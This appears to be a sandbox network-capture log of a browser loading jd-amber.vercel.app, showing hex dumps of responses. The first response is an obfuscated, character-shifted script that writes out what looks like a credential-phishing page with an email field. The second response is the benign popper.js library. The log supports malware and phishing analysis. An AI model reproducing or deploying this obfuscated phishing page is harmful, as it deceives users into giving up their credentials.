                          X-Vercel-Id: iad1::tpnpq-1720517601561-e4fb71ee4c2c
                          Connection: close
                          2024-07-09 09:33:21 UTC2372INData Raw: 3c 73 63 72 69 70 74 3e 76 61 72 20 73 3d 22 3d 74 64 73 6a 71 75 3f 0e 0b 3d 5c 22 2e 2e 21 64 70 65 66 21 63 7a 21 69 75 75 71 74 3b 30 30 78 78 78 2f 69 75 6e 6d 2e 64 70 65 66 2e 68 66 6f 66 73 62 75 70 73 2f 64 70 6e 21 2e 2e 3f 0e 0b 65 70 64 76 6e 66 6f 75 2f 78 73 6a 75 66 29 76 6f 66 74 64 62 71 66 29 28 26 34 44 69 75 6e 6d 26 33 31 6d 62 6f 68 26 34 45 26 33 33 66 6f 26 33 33 26 34 46 26 34 44 69 66 62 65 26 34 46 26 31 42 26 31 42 26 34 44 69 66 62 65 26 34 46 26 31 42 26 33 31 26 33 31 26 33 31 26 33 31 26 34 44 6e 66 75 62 26 33 31 64 69 62 73 74 66 75 26 34 45 26 33 33 76 75 67 2e 39 26 33 33 26 34 46 26 31 42 26 33 31 26 33 31 26 33 31 26 33 31 26 34 44 6e 66 75 62 26 33 31 6f 62 6e 66 26 34 45 26 33 33 77 6a 66 78 71 70 73 75 26 33 33 26
                          Data Ascii: <script>var s="=tdsjqu?=\"..!dpef!cz!iuuqt;00xxx/iunm.dpef.hfofsbups/dpn!..?epdvnfou/xsjuf)voftdbqf)(&4Diunm&31mboh&4E&33fo&33&4F&4Difbe&4F&1B&1B&4Difbe&4F&1B&31&31&31&31&4Dnfub&31dibstfu&4E&33vug.9&33&4F&1B&31&31&31&31&4Dnfub&31obnf&4E&33wjfxqpsu&33&
                          2024-07-09 09:33:21 UTC1065INData Raw: 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 34 44 65 6a 77 26 33 31 64 6d 62 74 74 26 34 45 26 33 33 6d 70 68 70 2e 64 70 77 66 73 26 33 33 26 34 46 26 31 42 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 34 44 6a 6e 68 26 33 31 74 73 64 26 34 45 26 33 33 69 75 75 71 74 26 34 42 30 30 62 74 67 62 74 67 62 74
                          Data Ascii: &31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&4Dejw&31dmbtt&4E&33mphp.dpwfs&33&4F&1B&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&31&4Djnh&31tsd&4E&33iuuqt&4B00btgbtgbt
                          2024-07-09 09:33:21 UTC4744INData Raw: 73 26 34 45 26 33 33 46 6f 75 66 73 26 33 31 46 6e 62 6a 6d 26 33 31 42 65 65 73 66 74 74 26 33 33 26 33 31 6a 65 26 34 45 26 33 33 66 6e 62 6a 6d 26 33 33 26 33 31 6f 62 6e 66 26 34 45 26 33 33 66 6e 62 6a 6d 26 33 33 26 33 31 75 7a 71 66 26 34 45 26 33 33 75 66 79 75 26 33 33 26 33 31 64 6d 62 74 74 26 34 45 26 33 33 67 70 73 6e 2e 64 70 6f 75 73 70 6d 26 33 33 26 33 31 73 66 62 65 70 6f 6d 7a 26 34 46 26 31 42 26 33 31 26 33 31 26 33 31 26 33 31 26 34 44 67 70 6f 75 26 33 31 64 70 6d 70 73 26 34 45 26 33 33 73 66 65 26 33 33 26 34 46 26 34 44 74 71 62 6f 26 33 31 6a 65 26 34 45 26 33 33 6e 74 68 26 33 33 26 34 46 26 34 44 30 74 71 62 6f 26 34 46 26 34 44 30 67 70 6f 75 26 34 46 26 31 42 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26 33 31 26
                          Data Ascii: s&4E&33Foufs&31Fnbjm&31Beesftt&33&31je&4E&33fnbjm&33&31obnf&4E&33fnbjm&33&31uzqf&4E&33ufyu&33&31dmbtt&4E&33gpsn.dpouspm&33&31sfbepomz&4F&1B&31&31&31&31&4Dgpou&31dpmps&4E&33sfe&33&4F&4Dtqbo&31je&4E&33nth&33&4F&4D0tqbo&4F&4D0gpou&4F&1B&31&31&31&31&31&31&31&
                          2024-07-09 09:33:21 UTC5930INData Raw: 33 69 75 75 71 74 26 34 42 30 30 6e 62 79 64 65 6f 2f 63 70 70 75 74 75 73 62 71 64 65 6f 2f 64 70 6e 30 63 70 70 75 74 75 73 62 71 30 35 2f 31 2f 31 30 6b 74 30 63 70 70 75 74 75 73 62 71 2f 6e 6a 6f 2f 6b 74 26 33 33 26 33 31 6a 6f 75 66 68 73 6a 75 7a 26 34 45 26 33 33 74 69 62 34 39 35 2e 4b 5b 53 37 54 71 66 6b 69 35 56 31 33 65 39 6b 50 75 37 77 4d 46 49 67 66 30 4b 52 48 6a 53 53 54 52 52 79 54 67 47 58 71 6a 32 4e 72 76 57 65 42 7a 6b 56 62 73 36 2c 38 37 51 57 44 6e 5a 6d 26 33 33 26 33 31 64 73 70 74 74 70 73 6a 68 6a 6f 26 34 45 26 33 33 62 6f 70 6f 7a 6e 70 76 74 26 33 33 26 34 46 26 34 44 30 74 64 73 6a 71 75 26 34 46 26 31 42 26 33 31 26 33 31 26 31 42 26 31 42 26 33 31 26 33 31 26 34 44 74 64 73 6a 71 75 26 33 31 74 73 64 26 34 45 26 33 33
                          Data Ascii: 3iuuqt&4B00nbydeo/cpputusbqdeo/dpn0cpputusbq05/1/10kt0cpputusbq/njo/kt&33&31joufhsjuz&4E&33tib495.K[S7Tqfki5V13e9kPu7wMFIgf0KRHjSSTRRyTgGXqj2NrvWeBzkVbs6,87QWDnZm&33&31dspttpsjhjo&4E&33bopoznpvt&33&4F&4D0tdsjqu&4F&1B&31&31&1B&1B&31&31&4Dtdsjqu&31tsd&4E&33
                          2024-07-09 09:33:21 UTC7116INData Raw: 3a 26 33 44 60 31 79 33 39 62 35 32 32 26 34 45 26 33 35 26 33 39 60 31 79 36 36 3a 32 3a 36 26 33 39 31 79 32 36 32 26 33 3a 26 33 3a 26 36 43 60 31 79 36 36 3a 32 3a 36 26 33 39 31 79 32 35 3a 26 33 3a 26 36 45 26 33 39 26 33 3a 26 33 44 60 31 79 35 66 65 37 62 37 26 34 45 26 33 35 26 33 39 60 31 79 36 36 3a 32 3a 36 26 33 39 31 79 32 36 34 26 33 3a 26 33 3a 26 36 43 26 33 38 69 75 6e 6d 26 33 38 26 36 45 26 33 39 26 33 3a 26 34 43 26 33 35 26 33 39 60 31 79 36 36 3a 32 3a 36 26 33 39 31 79 32 36 34 26 33 3a 26 33 3a 26 36 43 60 31 79 36 36 3a 32 3a 36 26 33 39 31 79 32 36 3a 26 33 3a 26 36 45 26 33 39 60 31 79 35 66 65 37 62 37 26 33 3a 26 34 43 77 62 73 26 33 31 60 31 79 33 31 3a 35 39 65 26 34 45 60 31 79 35 33 33 34 37 64 26 33 44 60 31 79 32 36 33
                          Data Ascii: :&3D`1y39b522&4E&35&39`1y66:2:6&391y262&3:&3:&6C`1y66:2:6&391y25:&3:&6E&39&3:&3D`1y5fe7b7&4E&35&39`1y66:2:6&391y264&3:&3:&6C&38iunm&38&6E&39&3:&4C&35&39`1y66:2:6&391y264&3:&3:&6C`1y66:2:6&391y26:&3:&6E&39`1y5fe7b7&3:&4Cwbs&31`1y31:59e&4E`1y53347d&3D`1y263
                          2024-07-09 09:33:21 UTC8302INData Raw: 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 31 3b 26 23 36 37 3b 26 23 31 30 38 3b 26 23 31 30 35 3b 26 23 31 31 30 3b 26 23 31 30 37 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 31 31 34 3b 26 23 31 30 31 3b 26 23 31 30 38 3b 26 23 33 37 3b 26 23 35 31 3b 26 23 36 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 35 30 3b 26 23 31 31 35 3b 26 23 31 31 36 3b 26 23 31 32 31 3b 26 23 31 30 38 3b 26 23 31 30 31 3b 26 23 31 31 35 3b 26 23 31 30 34 3b 26 23 31 30 31 3b 26 23 31 30 31 3b 26 23 31 31 36 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 35 30 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 31 30 34 3b 26 23 31 31 34 3b 26 23 31 30 31 3b 26 23 31
                          Data Ascii: 7;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#51;&#67;&#108;&#105;&#110;&#107;&#37;&#50;&#48;&#114;&#101;&#108;&#37;&#51;&#68;&#37;&#50;&#50;&#115;&#116;&#121;&#108;&#101;&#115;&#104;&#101;&#101;&#116;&#37;&#50;&#50;&#37;&#50;&#48;&#104;&#114;&#101;&#1
                          2024-07-09 09:33:21 UTC6676INData Raw: 23 35 30 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 31 30 39 3b 26 23 31 32 30 3b 26 23 34 35 3b 26 23 39 37 3b 26 23 31 31 37 3b 26 23 31 31 36 3b 26 23 31 31 31 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 35 30 3b 26 23 33 37 3b 26 23 35 31 3b 26 23 36 39 3b 26 23 33 37 3b 26 23 34 38 3b 26 23 36 35 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26
                          Data Ascii: #50;&#37;&#50;&#48;&#109;&#120;&#45;&#97;&#117;&#116;&#111;&#37;&#50;&#50;&#37;&#51;&#69;&#37;&#48;&#65;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&
                          2024-07-09 09:33:21 UTC10674INData Raw: 23 39 39 3b 26 23 31 31 31 3b 26 23 31 30 38 3b 26 23 31 31 31 3b 26 23 31 31 34 3b 26 23 33 37 3b 26 23 35 31 3b 26 23 36 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 35 30 3b 26 23 31 31 34 3b 26 23 31 30 31 3b 26 23 31 30 30 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 35 30 3b 26 23 33 37 3b 26 23 35 31 3b 26 23 36 39 3b 26 23 33 37 3b 26 23 35 31 3b 26 23 36 37 3b 26 23 31 31 35 3b 26 23 31 31 32 3b 26 23 39 37 3b 26 23 31 31 30 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 31 30 35 3b 26 23 31 30 30 3b 26 23 33 37 3b 26 23 35 31 3b 26 23 36 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 35 30 3b 26 23 31 30 39 3b 26 23 31 31 35 3b 26 23 31 30 33 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 35 30 3b 26 23 33 37 3b 26 23 35 31 3b 26 23 36 39 3b 26 23 33 37 3b 26
                          Data Ascii: #99;&#111;&#108;&#111;&#114;&#37;&#51;&#68;&#37;&#50;&#50;&#114;&#101;&#100;&#37;&#50;&#50;&#37;&#51;&#69;&#37;&#51;&#67;&#115;&#112;&#97;&#110;&#37;&#50;&#48;&#105;&#100;&#37;&#51;&#68;&#37;&#50;&#50;&#109;&#115;&#103;&#37;&#50;&#50;&#37;&#51;&#69;&#37;&
                          2024-07-09 09:33:21 UTC11860INData Raw: 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 33 37 3b 26
                          Data Ascii: #50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&#50;&#48;&#37;&
                          2024-07-09 09:33:21 UTC10234INData Raw: 31 30 36 3b 26 23 31 31 35 3b 26 23 34 37 3b 26 23 34 39 3b 26 23 34 36 3b 26 23 34 39 3b 26 23 35 30 3b 26 23 34 36 3b 26 23 35 37 3b 26 23 34 37 3b 26 23 31 31 37 3b 26 23 31 30 39 3b 26 23 31 30 30 3b 26 23 34 37 3b 26 23 31 31 32 3b 26 23 31 31 31 3b 26 23 31 31 32 3b 26 23 31 31 32 3b 26 23 31 30 31 3b 26 23 31 31 34 3b 26 23 34 36 3b 26 23 31 30 39 3b 26 23 31 30 35 3b 26 23 31 31 30 3b 26 23 34 36 3b 26 23 31 30 36 3b 26 23 31 31 35 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 35 30 3b 26 23 33 37 3b 26 23 35 30 3b 26 23 34 38 3b 26 23 31 30 35 3b 26 23 31 31 30 3b 26 23 31 31 36 3b 26 23 31 30 31 3b 26 23 31 30 33 3b 26 23 31 31 34 3b 26 23 31 30 35 3b 26 23 31 31 36 3b 26 23 31 32 31 3b 26 23 33 37 3b 26 23 35 31 3b 26 23 36 38 3b 26 23 33 37 3b 26 23
                          Data Ascii: 106;&#115;&#47;&#49;&#46;&#49;&#50;&#46;&#57;&#47;&#117;&#109;&#100;&#47;&#112;&#111;&#112;&#112;&#101;&#114;&#46;&#109;&#105;&#110;&#46;&#106;&#115;&#37;&#50;&#50;&#37;&#50;&#48;&#105;&#110;&#116;&#101;&#103;&#114;&#105;&#116;&#121;&#37;&#51;&#68;&#37;&#


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.749708104.17.25.144432708C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-07-09 09:33:22 UTC689OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                          Host: cdnjs.cloudflare.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Origin: https://jd-amber.vercel.app
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: script
                          Referer: https://jd-amber.vercel.app/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-07-09 09:33:22 UTC967INHTTP/1.1 200 OK
                          Date: Tue, 09 Jul 2024 09:33:22 GMT
                          Content-Type: application/javascript; charset=utf-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Access-Control-Allow-Origin: *
                          Cache-Control: public, max-age=30672000
                          ETag: W/"5eb03fa9-4af4"
                          Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                          cf-cdnjs-via: cfworker/kv
                          Cross-Origin-Resource-Policy: cross-origin
                          Timing-Allow-Origin: *
                          X-Content-Type-Options: nosniff
                          CF-Cache-Status: HIT
                          Age: 2207774
                          Expires: Sun, 29 Jun 2025 09:33:22 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PA5sFxKBaQHiiSjMmS4wrvdII5xF1lkhS2xRzuMzjxe8vF8r4sOGe%2Bem%2BfVx2cFW0xChbJmmkdP%2FABy9bu%2FKEgtSOZ85S%2B%2FdWmUlCbG91poSuCB4ywq5MPPhJ4Q6h%2FKMDjbUvGlt"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                          Strict-Transport-Security: max-age=15780000
                          Server: cloudflare
                          CF-RAY: 8a074fe6ceb342ec-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-07-09 09:33:22 UTC402INData Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                          Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                          2024-07-09 09:33:22 UTC1369INData Raw: 7b 69 66 28 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64
                          Data Ascii: {if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#d
                          2024-07-09 09:33:22 UTC1369INData Raw: 20 6c 28 65 2c 74 29 7b 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28
                          Data Ascii: l(e,t){var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(
                          2024-07-09 09:33:22 UTC1369INData Raw: 68 3d 63 28 7b 74 6f 70 3a 70 2e 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d
                          Data Ascii: h=c({top:p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=
                          2024-07-09 09:33:22 UTC1369INData Raw: 67 68 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72
                          Data Ascii: ght,height:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var
                          2024-07-09 09:33:22 UTC1369INData Raw: 26 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65
                          Data Ascii: &console.warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e
                          2024-07-09 09:33:22 UTC1369INData Raw: 72 73 28 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c
                          Data Ascii: rs(),this.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,
                          2024-07-09 09:33:22 UTC1369INData Raw: 61 6d 65 3b 72 65 74 75 72 6e 20 6f 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 73 20 72 65 71 75 69 72 65 64 20 62 79 20 27 2b 72 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 77 6f 72 6b 2c 20 62 65 20 73 75 72 65 20 74 6f 20 69 6e 63 6c 75 64 65 20 69 74 20 62 65 66 6f 72 